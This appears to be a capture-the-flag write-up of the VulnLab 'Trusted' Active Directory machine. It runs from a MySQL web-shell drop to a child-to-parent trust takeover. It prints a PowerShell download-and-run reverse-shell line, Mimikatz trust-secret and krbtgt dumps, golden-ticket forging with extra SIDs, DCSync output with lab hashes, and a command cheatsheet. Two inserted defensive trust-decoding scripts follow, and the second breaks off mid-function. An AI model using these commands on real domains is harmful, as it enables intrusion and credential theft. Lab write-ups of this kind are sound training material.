This is one way to get initial access, but I didn't use this method. Instead, I got RCE through LFI, performed DCSync, grabbed the administrator's hashes, and started the machine from there.

Method 2: MySQL to RCE, Dropping a Web Shell

Since the MySQL port is open and the database is running as root, we can use the phpinfo file to locate the web root and write a web shell into the /dev directory with SELECT ... INTO OUTFILE to get RCE.

select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";

cmd=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.5.124/shell.php');

By creating a reverse shell, then starting a Python server and setting up a listener, we successfully get our shell. Now, it's time to hunt for passwords as part of Windows privilege escalation. The best script for this is LaZagne, which retrieves passwords and hashes. 🔥

You'll get the administrator's hash using LaZagne, and if you want more, you can retrieve additional hashes with impacket-secretsdump. After validating the hash, it works! Now, I'll use PS Remoting, but as I mentioned before, always validate the hash against multiple services like MSSQL, SMB, WinRM, RDP, and so on.

WinRM works fine, but RDP doesn't, so I enabled Restricted Admin mode on RDP and logged in with the hash! 🔥😈

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# evil-winrm -i 10.10.231.182 -u Administrator -H '75878369ad33f35b7070ca854100bc07'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   3:33 PM             36 User.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat user.txt
VL{349efd4b1ccbeb4d3ca0108fa5cc5802}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
The operation completed successfully.

Restricted Admin mode on RDP

So, that is the bypass: the last command in the Evil-WinRM session sets DisableRestrictedAdmin to 0, which turns Restricted Admin mode on so that RDP accepts the NT hash instead of a password... and here we go!

This is the real deal now, the most important stage of the machine. Forget the initial access, that was just a warm-up. Now, this is where the magic happens! 🔥 Before going on, check out Will Schroeder's talk on Active Directory trust abuse, which this stage follows:

https://medium.com/media/809319a3ec549a03da80242940a03083/href
https://medium.com/media/61999eb8353bb5cf71fb133b4a8011bb/href

📌 Let the war begin with the Trust Attack!

Enumeration Phase: Mapping the Battlefield 🔍🔥

After opening the RDP session, I launched an Administrator PowerShell, imported the Active Directory module, and started enumerating users, trusts, forests, and more. This stage usually takes some time, so I'll be making a separate blog post focused on post-initial-access enumeration in Active Directory.

Trust Enumeration: Unraveling the AD Relationships

PS C:\Users\Administrator> Get-ADTrust -Filter *

Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : trusted.vl
ObjectClass             : trustedDomain
ObjectGUID              : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=lab,DC=trusted,DC=vl
Target                  : trusted.vl
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

PS C:\Users\Administrator>

With that command, we now know that lab.trusted.vl has a bidirectional, intra-forest trust with trusted.vl (IntraForest: True, SIDFilteringQuarantined: False).
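The Get-ADTrust output above is what decides whether the SID History attack in the next section can work at all: TrustAttributes 32 is the WITHIN_FOREST flag, and SIDFilteringQuarantined is False, so SIDs carried in a ticket's SID history from the child domain are honored by the parent. The script below is an added example, not code from the write-up, VulnLab or the ActiveDirectory module: it parses the block Get-ADTrust prints, expands the TrustAttributes bitmask with the flag names from MS-ADTS, and rates each trust's SID-history exposure. The first sample block is the write-up's own trust object; the second (partner.example) is constructed for contrast.

```python
"""Decode Get-ADTrust output and rate each trust's SID-history exposure.

Added example (not from the write-up): parses the property/value block that
Get-ADTrust prints, expands TrustAttributes with the flag names from MS-ADTS
(trustAttributes), and reports whether SIDs carried in a ticket's SID history
would be honored across the trust. The first block in SAMPLE_OUTPUT is the
write-up's own trust object; the second is constructed for contrast.
"""
import re

# TrustAttributes bits (MS-ADTS, trustAttributes attribute).
TRUST_ATTRIBUTE_FLAGS = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",  # SID filtering enforced on this trust
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",  # parent/child or tree-root trust
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

PROP_RE = re.compile(r'^\s*([A-Za-z]+)\s*:\s*(.*?)\s*$')


def parse_trust_blocks(text: str) -> list[dict]:
    """One dict per trust; blank lines separate objects, True/False become bools."""
    trusts, current = [], {}
    for line in text.splitlines():
        m = PROP_RE.match(line)
        if m:
            key, value = m.groups()
            current[key] = {"True": True, "False": False}.get(value, value)
        elif not line.strip() and current:
            trusts.append(current)
            current = {}
    if current:
        trusts.append(current)
    return trusts


def decode_attributes(value: int) -> list[str]:
    """Flag names set in a TrustAttributes value, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]


def sid_history_exposure(trust: dict) -> dict:
    """Rate one parsed trust object; the verdict string starts with HIGH/low/review."""
    attrs = int(trust.get("TrustAttributes") or 0)
    quarantined = bool(attrs & 0x0004) or trust.get("SIDFilteringQuarantined") is True
    if quarantined:
        verdict = "low: SID filtering (quarantine) active"
    elif attrs & 0x0020:
        # The forest, not the domain, is the security boundary: SID filtering is
        # off by default inside a forest, so a child-domain compromise reaches the parent.
        verdict = "HIGH: intra-forest trust, SID history from the child is honored"
    elif attrs & 0x0008:
        verdict = "review: forest trust, confirm SID history was not enabled (netdom trust /enablesidhistory)"
    else:
        verdict = "HIGH: external trust without SID filtering"
    return {"name": trust.get("Name"), "direction": trust.get("Direction"),
            "flags": decode_attributes(attrs), "verdict": verdict}


def assess(trusts: list[dict]) -> list[dict]:
    return [sid_history_exposure(t) for t in trusts]


# First block: the write-up's Get-ADTrust output. Second block: constructed external trust.
SAMPLE_OUTPUT = """
Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive        : False
IntraForest             : True
Name                    : trusted.vl
ObjectClass             : trustedDomain
ObjectGUID              : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=lab,DC=trusted,DC=vl
Target                  : trusted.vl
TrustAttributes         : 32
TrustedPolicy           :
TrustType               : Uplevel

Direction               : Inbound
DistinguishedName       : CN=partner.example,CN=System,DC=trusted,DC=vl
ForestTransitive        : False
IntraForest             : False
Name                    : partner.example
ObjectClass             : trustedDomain
SIDFilteringQuarantined : True
Source                  : DC=trusted,DC=vl
Target                  : partner.example
TrustAttributes         : 4
TrustType               : Uplevel
"""

if __name__ == "__main__":
    for row in assess(parse_trust_blocks(SAMPLE_OUTPUT)):
        print(f'{row["name"]:18} {row["direction"]:14} {",".join(row["flags"]):24} {row["verdict"]}')
```

Feed it the saved text of Get-ADTrust -Filter * from each domain in the forest; the intra-forest verdict is the important one, because no per-trust setting removes it and the only real mitigation is to treat every domain in the forest as part of one security boundary.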
But honestly, I already knew that before enumerating in RDP, because I uploaded SharpHound, ran it, and got the results right away!

Now I will perform the SID History attack, as mentioned in the talk I referenced earlier.

I uploaded Mimikatz by running a Python server and then transferred it from my attacker machine to the RDP session using this command:

Invoke-WebRequest -Uri "http://10.8.5.124/mimi.exe" -OutFile "C:\Users\Administrator\Documents\mimi.exe"

1. First step: Dumping trust secrets using this Mimikatz module:

PS C:\Users\Administrator\Documents> ./mimi.exe "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 2/15/2025 6:47:42 PM - CLEAR   - ad 4a 9a 08 93 2b 62 f1 5a d7 df 25 a6 3c da 9c b1 a7 8a 2f 7f e4 04 fe 21 0a a0 5a 36 af 51 4e 56 4e 2b c6 be 17 b3 68 de 96 04 62 b0 c5 e0 a0 e8 90 22 65 f4 12 86 3f da 2b cb d7 34 f9 9e ad 53 d5 bb 81 96 07 8e 1b 94 3a c4 9c 8a 62 58 dc 55 76 36 b7 77 a4 a8 33 58 50 e4 b9 58 ed 63 21 60 b3 d5 48 c9 16 5d 96 88 52 04 e2 63 18 54 86 3a 14 7d 92 5c 62 99 bf e9 27 bc 93 37 e6 da 6c 1e b0 f3 e6 79 43 85 b3 af 90 6a 38 ec ef 6c a5 0d e2 f5 28 68 5a 0d e2 bd 84 3e d7 21 a3 b6 8b ff 57 d4 b4 6b a7 70 4a a2 e3 f1 25 d7 83 69 20 9a 77 a2 71 3d 1a f8 c6 f0 fb 3f ed 0c 63 5f 37 3a 47 5f 9e 60 0d 87 f7 52 5c 20 e3 a6 a0 60 37 6f 7b 3d 24 c1 01 1f e9 32 15 39 f8 9c 99 22 60 0e 9a 79 c8 c8 38 cd dc ec 5b f4 91 bc 62 64 8b
        * aes256_hmac       7d52770f3e1d54f3e5283b275eca8ccd90d53244175dcf751ebd2f465af038c8
        * aes128_hmac       4882ff6bf62aefaa071edeb824ee0612
        * rc4_hmac_nt       29dcfffd25cf0e36b487a9c4bd465319

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 2/15/2025 7:02:42 PM - CLEAR   - 9b ca d0 cd 75 16 60 8e 18 49 33 bf d9 17 e0 23 97 f5 b8 39 b6 24 e8 84 23 30 04 d3 57 4d 36 40 23 44 30 13 8e 5b eb 7c a6 5c 01 b6 49 85 4c 73 86 13 6b 8a d3 df 19 03 c5 5b b2 a6 bc 6c e5 cf ae 97 d8 87 bc 54 35 d4 f5 71 b6 28 5b ff 55 16 32 63 21 78 35 fb c7 b5 85 61 f7 df df 32 a8 6c 75 a9 dd 30 33 90 f2 81 b5 4f 75 61 e8 4c 76 d1 90 48 b2 45 dd 11 dc d0 3c 5e 17 a7 35 4f 8e db df 83 3c 5f 6e dd e9 e1 ac 17 90 53 58 ab cb 48 ac e1 cf 71 5d e7 12 c0 b8 3d c6 3f 25 56 10 e5 49 4b b0 d1 1b ff 72 3f 78 a8 f0 67 97 e1 fa 98 e7 91 7a fa 1e 49 9e 52 53 af a7 4e 0c 94 e4 6b 0f db c7 01 5f 07 73 f2 63 cf 74 fc 32 a7 02 f8 9c 8f d6 85 16 09 f5 27 7a a0 64 aa 64 9b f3 e8 e4 fd 28 2f 64 ec f8 85 7b 88 01 7f 3e 33 53 38
        * aes256_hmac       94276ee51327110295ce9d03547c203d08db16b8385fc3391c2b599f44803f8d
        * aes128_hmac       bf84dbf7d0b72a5d26156ba6a5c33671
        * rc4_hmac_nt       aba63a11ab05b2765b2b81d0910bbc15

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
        * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
        * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
        * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 2/15/2025 7:02:42 PM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
        * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
        * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
        * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0

mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator\Documents>

2. Second step: Retrieving the domain SID using this command:

PS C:\Users\Administrator\Documents> whoami /user

USER INFORMATION
----------------

User Name         SID
================= =============================================
lab\administrator S-1-5-21-2241985869-2159962460-1278545866-500
PS C:\Users\Administrator\Documents>

3. Third step: Retrieving the SID of the Enterprise Admins group using this command:

PS C:\Users\Administrator\Documents> get-adgroup -Filter {name -eq "Enterprise Admins"} -Server trusted.vl

DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3576695518-347000760-3731839591-519
PS C:\Users\Administrator\Documents>

4. Fourth step: Dumping krbtgt, because this attack is basically a Golden Ticket, but even better... Golden is now more golden! 🎫🔥

PS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /patch /user:krbtgt
Domain : LAB / S-1-5-21-2241985869-2159962460-1278545866

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : c7a03c565c68c6fac5f8913fab576ebd

mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator\Documents>

5. Fifth step: Now, let's fire up the attack and take over!

PS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbi" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbi
User      : Administrator
Domain    : lab.trusted.vl (LAB)
SID       : S-1-5-21-2241985869-2159962460-1278545866
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3576695518-347000760-3731839591-519 ;
ServiceKey: c7a03c565c68c6fac5f8913fab576ebd - rc4_hmac_nt
Lifetime  : 2/15/2025 8:47:36 PM ; 2/13/2035 8:47:36 PM ; 2/13/2035 8:47:36 PM
-> Ticket : C:\Users\Administrator\Documents\ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator\Documents>

Now, let's pass the ticket to inject our forged ticket into the session. After that, we'll perform DCSync, dump the Administrator's hash, and log in like a boss.

PS C:\Users\Administrator\Documents> .\mimi.exe "privilege::debug" "kerberos::ptt C:\users\administrator\documents\ticket.kirbi" "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::ptt C:\users\administrator\documents\ticket.kirbi

* File: 'C:\users\administrator\documents\ticket.kirbi': OK

mimikatz(commandline) # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500
[DC] 'trusted.vl' will be the domain
[DC] 'trusteddc.trusted.vl' will be the DC server
[DC] 'S-1-5-21-3576695518-347000760-3731839591-500' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 0: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 1: 86a9ee70dfd64d20992283dc5721b475
    lm  - 0: 1a28b083f0e83167bec07d185d492a67

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7ad3ac096b425259c12c6cade75241c9

* Primary:Kerberos-Newer-Keys *
    Default Salt : TRUSTED.VLAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
      aes128_hmac       (4096) : 1cee32af6e8cd27059d855e6c6b4d5ec
      des_cbc_md5       (4096) : aed5e385512c685e
    OldCredentials
      aes256_hmac       (4096) : 11b39019ac5f9715327f55a1b44820da82e32b14ce2dd40f142192f4eeab1336
      aes128_hmac       (4096) : c88a36f9c11a83c13a03f3d48aae78a4
      des_cbc_md5       (4096) : 2fe99be0a82c49d0
    OlderCredentials
      aes256_hmac       (4096) : c88291723e622259b4a930eec2c087348c258a09d5720fdb11625fd6432057f8
      aes128_hmac       (4096) : c803feb47873e961875882b3909edd2b
      des_cbc_md5       (4096) : 292ab5329be9ce40

* Primary:Kerberos *
    Default Salt : TRUSTED.VLAdministrator
    Credentials
      des_cbc_md5       : aed5e385512c685e
    OldCredentials
      des_cbc_md5       : 2fe99be0a82c49d0

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  78a97cd0944c04736ebc5c6a41151044
    02  9f038aad902811d760f8ab1870ec8817
    03  8b69a5557480678e214f7fcf8a1b5299
    04  78a97cd0944c04736ebc5c6a41151044
    05  a02112deac62e4ac6f5ae005e80dca33
    06  524fdfa5abe0491f80ea30779ccc4673
    07  b8c416ff7f3b06308bdb914e5e974489
    08  01e3d6cffddd4bd9e9b6ae361e226569
    09  2d423b7e046d43c0e78e19f1d2cf3788
    10  98014f1215b902e6215f97ec52ba4915
    11  762701fd0c34e1f70c11fdb4378e9d3d
    12  01e3d6cffddd4bd9e9b6ae361e226569
    13  61f7063f23adab72b60fded48fbf2854
    14  d5c36527291c60a7ccd2fa4f214f36cc
    15  553607358db97eb65e234bf8aeb52e8d
    16  a8d4e1e3131446e6d000597a03727854
    17  dbf6bf6fad3583eb2bc387a540a3cf68
    18  fe8bb83ce7236f88c86ee1f56cb198bd
    19  b0bdc788c9df34f4d7b0ae9ecb970cc0
    20  df0e59fd58ada70c2c61de837652a72f
    21  035f102a7c5c5159054e450924b0a326
    22  0f8c9e30d9e9066376e868dc60178b7f
    23  c65977b340f78e2a1ff601035748959b
    24  4a3f6237a32c525029e3d2cf0cc4f51d
    25  7791924095599f3112d1156fa93e65c2
    26  c8377915d36d8bdd86925c1da86ebe04
    27  655f04c5a10c8045ec789ae964093ccf
    28  7e1eee2805079de9885d2c2957285a6e
    29  c10f5a9d43d4cc149bed1e98df67d560

mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator\Documents>

Root flag

┌──(root㉿kali)-[/home/kali/VulnLab/Trusted]
└─# evil-winrm -i 10.10.231.181 -u administrator -H 15db914be1e6a896e7692f608a9d72ef

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> [System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")
True
*Evil-WinRM* PS C:\Users\Administrator\Documents> CIPHER /u /n

Encrypted File(s) on your system:
C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat root.txt
Cannot find path 'C:\Users\Administrator\Documents\root.txt' because it does not exist.
At line:1 char:2
+ cat root.txt
+ ~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Admini...uments\root.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload RunasCs.exe
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\RunasCs.exe administrator "Password!1234" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"
VL{1f-----------------------------}
*Evil-WinRM* PS C:\Users\Administrator\Documents>

root.txt carries the Encrypted attribute and cipher /u /n lists it as EFS-encrypted, so a session opened with only the NT hash cannot unlock the key that decrypts it; RunasCs with the Administrator's cleartext password creates a logon that can, and reads the flag.

Mini Cheatsheet for All Commands After Getting into RDP

# 1. Import Active Directory module
Import-Module ActiveDirectory

# 2. Enumerate users in the domain
Get-ADUser -Filter * -Properties *

# 3. Enumerate trusts
Get-ADTrust -Filter *

# 4. Dumping trust secrets with Mimikatz
mimikatz.exe "privilege::debug" "lsadump::trust"

# 5. Retrieve domain SID
wmic useraccount get name,sid

# 6. Retrieve SID of Enterprise Admins
Get-ADGroup -Filter {Name -eq "Enterprise Admins"}

# 7. Dump krbtgt for Golden Ticket attack
mimikatz.exe "lsadump::dcsync /user:krbtgt"

# 8. Pass the ticket to inject into the session
mimikatz.exe "kerberos::ptt <ticket_file>"

# 9. Perform DCSync to dump hashes
mimikatz.exe "lsadump::dcsync /user:<username>"

Demo for the same attack on the Trusted machine

Recap: Conquering the Trusted Machine

To sum it all up, this journey started with initial access via web app fuzzing and LFI, leading us to RCE. From there, we went on to enumerate Active Directory, focusing on trust relationships. By leveraging tools like SharpHound, we mapped out the bidirectional trust between domains and dug deep into SID History attacks.

We then uploaded Mimikatz, dumped the krbtgt account, and performed DCSync to retrieve hashes. After validating the hashes across services like WinRM and RDP, we enabled Restricted Admin mode on RDP and gained access. Finally, we executed the Golden Ticket attack, allowing us to escalate privileges and dump the Administrator hash.

Root flag obtained. Mission accomplished!

Remember: trust attacks are your best friends in environments with weak domain configurations. Keep your enumeration clean and methodical, and you'll find the weak spots that lead to total domination.

Do You Wanna Chat with Maverick? 🥂

Don't forget to follow me on LinkedIn and Twitter, and give me some respect on Hack The Box! I love chatting with like-minded people, sharing knowledge, and learning from everyone. Happy hacking! 🚀
🚀

References

- Атаки на трасты между доменами (Attacks on trusts between domains)
- Attacking Active Directory | s0cm0nkey's Security Reference Guide
- From Domain Admin to Enterprise Admin | Red Team Notes
- It's All About Trust - Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts
- Kerberos Golden Tickets are Now More Golden
- Trusts | The Hacker Recipes

"These tools and techniques were instrumental in demonstrating the power of trust abuse and Active Directory exploitation, showcasing common tactics used in real-world red team engagements."

Maverick just pwned Trusted @ Vulnlab!

VulnLab Trusted | Maverick Got Your Trusted Baby😉 was originally published in InfoSec Write-ups on Medium.
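Steps 3 and 4 of the cheatsheet enumerate the trusts and dump their secrets, but whether a forged SID History (the ExtraSids of a golden ticket) survives the hop into the other domain is decided by the trust's trustAttributes flags, which both Get-ADTrust and an LDAP query of the trustedDomain objects return as an integer. The script below decodes that bitmask and triages each trust. It is an added example written for this page, not code from the writeup or from Vulnlab: the bit values are the trustAttributes flags documented in MS-ADTS, SAMPLE_TRUSTS is constructed data, and the risk labels are a first-pass triage, not a proof of exploitability (they ignore direction and selective authentication).

```python
"""Decode Active Directory trustAttributes / trustDirection values and flag
trusts on which SID History (the ExtraSids of a forged inter-realm TGT)
would be honoured by the trusting side.

Added example for this page; not code from the VulnLab writeup. The bit
values are the trustAttributes flags documented in MS-ADTS; SAMPLE_TRUSTS
is constructed data in the shape of trustedDomain LDAP objects.
"""

# trustAttributes bit flags (MS-ADTS)
TRUST_ATTRIBUTES = {
    0x00000001: "NON_TRANSITIVE",
    0x00000002: "UPLEVEL_ONLY",
    0x00000004: "QUARANTINED_DOMAIN",       # SID filtering enforced on the trust
    0x00000008: "FOREST_TRANSITIVE",
    0x00000010: "CROSS_ORGANIZATION",       # selective authentication
    0x00000020: "WITHIN_FOREST",            # parent/child or tree-root trust
    0x00000040: "TREAT_AS_EXTERNAL",
    0x00000080: "USES_RC4_ENCRYPTION",      # inter-realm tickets keyed with the RC4 trust key
    0x00000200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x00000400: "PIM_TRUST",
}

# trustDirection values (MS-ADTS)
TRUST_DIRECTION = {0: "disabled", 1: "inbound", 2: "outbound", 3: "bidirectional"}


def decode_trust_attributes(value: int) -> list[str]:
    """Names of the flags set in a trustAttributes integer, lowest bit first.
    Bits outside the table are collected into one UNKNOWN_0x... entry."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names


def assess_trust(trust: dict) -> dict:
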